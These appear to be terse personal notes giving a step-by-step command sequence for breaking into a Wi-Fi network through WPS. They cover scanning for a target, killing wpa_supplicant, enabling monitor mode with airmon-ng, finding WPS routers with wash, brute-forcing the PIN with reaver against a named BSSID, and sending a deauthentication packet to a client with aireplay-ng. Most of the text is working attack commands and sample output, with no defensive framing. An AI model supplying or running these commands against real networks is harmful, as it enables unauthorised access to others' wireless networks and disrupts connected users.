# iwlist wlp2s0 scan
# iwconfig wlp2s0 essid name_of_network
To get mac address of the target cell;
# iwlist wlp2s0 scan
Example output that matter;
Cell 03 - Address: A8:A6:68:98:0C:C5
First check processes that interfere with state of the interface and kill them;
# airmon-ng check
Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
1271 wpa_supplicant
1576 wpa_supplicant
1633 dhclient
Process with PID 1576 (wpa_supplicant) is running on interface wlan0
Process with PID 1633 (dhclient) is running on interface wlan0
Pkill or kill all of them, ex 1271;
# kill -15 1271
If that fails;
# kill -9 1271
If wireless card is intel;
# rmmod iwlmvm
# rmmod iwlwifi
# modprob iwlwifi
Put interface in monitor mode;
# iwconfig wlp2s0 mode monitor
# ifconfig wlp2s0 up
# airmon-ng start wlp2s0
Interface Chipset Driver
wlp2s0 Intel AC iwlwifi - [phy1]
(monitor mode enabled on mon0)
Airdump-ng don't report if a router have WPS or not, for that is used wash;
# wash -i wlp2s0
If the program report "Found packet with bad FCS", run with -C;
# wash -C -i wlp2s0
Put mon0 on same channel of target cell;
# iwconfig mon0 channel 6
Start the magic;
# reaver -i mon0 -b A8:A6:68:98:0C:C5 -c 6 -vv
If BSSID is cloaked, not being broadcasted, provide it to reaver;
# reaver -i mon0 -b A8:A6:68:98:0C:C5 -c 6 -e "bssid_name" -vv
-a address of access point, -c client to deauthenticate
aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0